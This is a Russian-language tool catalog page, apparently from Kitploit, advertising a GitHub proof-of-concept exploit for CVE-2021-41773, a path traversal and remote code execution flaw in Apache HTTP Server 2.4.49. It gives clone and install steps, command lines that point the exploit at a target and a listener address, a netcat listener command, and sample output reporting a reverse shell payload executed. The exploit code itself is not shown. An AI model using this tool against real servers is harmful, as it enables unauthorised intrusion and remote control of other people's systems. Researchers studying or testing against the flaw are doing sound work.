Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-41773 — PoC-эксплойт для CVE-2021-41773, уязвимости обхода пути и удаленного выполнения кода в Apache HTTP Server 2.4.49. Автоматизирует проверку уязвимости и выполнение полезной нагрузки обратной оболочки. | Kitploit
Инструменты/GitHubGitHub/adrianmafandy/cve-2021-41773
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubadrianmafandy/cve-2021-41773

CVE-2021-41773

PoC-эксплойт для CVE-2021-41773, уязвимости обхода пути и удаленного выполнения кода в Apache HTTP Server 2.4.49. Автоматизирует проверку уязвимости и выполнение полезной нагрузки обратной оболочки.

Репозиторий
1210 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-41773 - Apache HTTP Server 2.4.49: обход пути и RCE

Security Platform Language

📖 Описание

Это PoC-эксплойт для CVE-2021-41773 — уязвимости обхода пути и удалённого выполнения кода в Apache HTTP Server 2.4.49.

Детали уязвимости

  • CVE: CVE-2021-41773
  • Затронутая версия: Apache HTTP Server 2.4.49
  • Тип уязвимости: Обход пути → удалённое выполнение кода

🚀 Использование

Установка

root@kitploit:~
git clone https://github.com/adrianmafandy/CVE-2021-41773
cd CVE-2021-41773
pip install requests

Базовое использование

root@kitploit:~
# Basic syntax
python3 exploit.py -t <TARGET-URL> -lh <LHOST> -lp <LPORT>

# Force exploitation even if vulnerability check fails
python3 exploit.py -t <TARGET-URL> -lh <LHOST> -lp <LPORT> -f

Пример

root@kitploit:~
# Basic syntax
python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337

# Force exploitation even if vulnerability check fails
python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337 -f

Настройка слушателя

Перед запуском эксплойта настройте netcat-слушатель:

root@kitploit:~
nc -lvnp 4444

Ожидаемый вывод

root@kitploit:~
$ python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337

     ______
    (_____ \
     _____) ) _ _ ____   ____ ___   ____
    |  ____/ | | |  _ \ / ___) _ \ / _  |
    | |    | | | | | | | |  | |_| ( (_| |
    |_|     \___/|_| |_|_|   \___/ \___ |
                                  (_____|

       Apache2 2.4.49 - CVE-2021-41773

   
[*] Checking if target is vulnerable...
[+] Target is VULNERABLE!
[*] Executing reverse shell payload...
[+] Reverse shell payload executed successfully!
[*] Check your listener
Скачать инструмент